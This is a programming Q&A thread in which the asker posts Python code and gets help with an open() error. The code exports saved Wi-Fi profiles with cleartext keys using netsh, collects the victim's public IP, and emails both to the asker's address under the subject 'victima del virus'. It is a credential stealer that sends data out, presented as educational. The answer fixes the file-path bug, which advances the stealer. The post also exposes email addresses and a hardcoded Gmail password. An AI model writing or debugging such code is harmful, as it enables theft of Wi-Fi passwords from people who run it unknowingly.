# Error while using open function in python 3.8.0

Tags: python-3.x

im spanish so some parts of the code are in spanish

im making a app that sends me to me mail the public ip and wifi password of the person who executed the code (its a educational porpouse proyect)

it gives me this error :

File "crack part 1.py", line 23, in 
    f = str(open("C:"+"/red inalambrica-",reques,".xml", "r"))
TypeError: an integer is required (got type str)

my code in PYTHON 3.8.1

```
#748273879318792 try of do a ext. ip address email sent and not working

#finally it worked

import subprocess

requests = "requests"

subprocess.call(['pip', 'install', requests])

from requests import get

import smtplib

ip = str(get('https://api.ipify.org').text)

y = "C:"

reques = str(input("pon el nombre de tu red : "))

x = str(subprocess.call(['netsh', 'wlan', "export", "profile", "key=clear", "folder=", y]))

f = open("C:"+"/red inalambrica-",reques,".xml", "r")

TO = 'ticua07@gmail.com'
SUBJECT = 'victima del virus'

TEXT = ip, data

    # Gmail Sign In
gmail_sender = 'logonuihacks@gmail.com'
gmail_passwd = '1230984567'

server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(gmail_sender, gmail_passwd)

BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: %s' % SUBJECT,str(TEXT)])

try:
    server.sendmail(gmail_sender, [TO], BODY)
    print ('email sent')
except:
    print ('error sending mail')
    server.quit()
```

Comment: Please don't edit your original question into a completely new question. Please accept the solution if it solved your original problem and ask another question

Comment: Please don't edit questions in ways that invalidate existing answers.

Comment: Please don't add 'solved' or 'fixed'. Either post the answer and accept either accept the existing answer. If it was a typo or not reproductible, then delete your post, or put at least a comment about

Answer (score 1):

You need to concatenate the string in your call to open instead of separating it with commas.

The builtin [**`open`**](https://docs.python.org/3/library/functions.html#open) function accepts many optional arguments:

> **open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None)**

The way *you* are currently calling it is:

```
f = open("C:"+"/red inalambrica-",reques,".xml", "r")
```

which sets `file="C:/red inalambrica-"`, `mode=reques`, `buffering=".xml"`, and `encoding="r"`... which is clearly gibberish.

The error is caused when it tries to set the `buffering` keyword (which should indicate the integer number of bytes to allocate to the buffer) to the string `".xml"`.

Replace your call with this:

```
f = open("C:" + "/red inalambrica-" + reques + ".xml", "r")
```

or

```
f = open(f"C:/red inalambrica-{reques}.xml", "r")
```

if you are using python 3.6 or higher.

Comment: another error : line 42 , SyntaxError unexpected eof while parsing

Comment: You get that when you have unmatched parens or quotations.

Comment: anyone see a error?? i checked it 10 times and all is matched and nothing be to error

Comment: i half-fixed the error cuz the try: function was not working but How To Fix IT?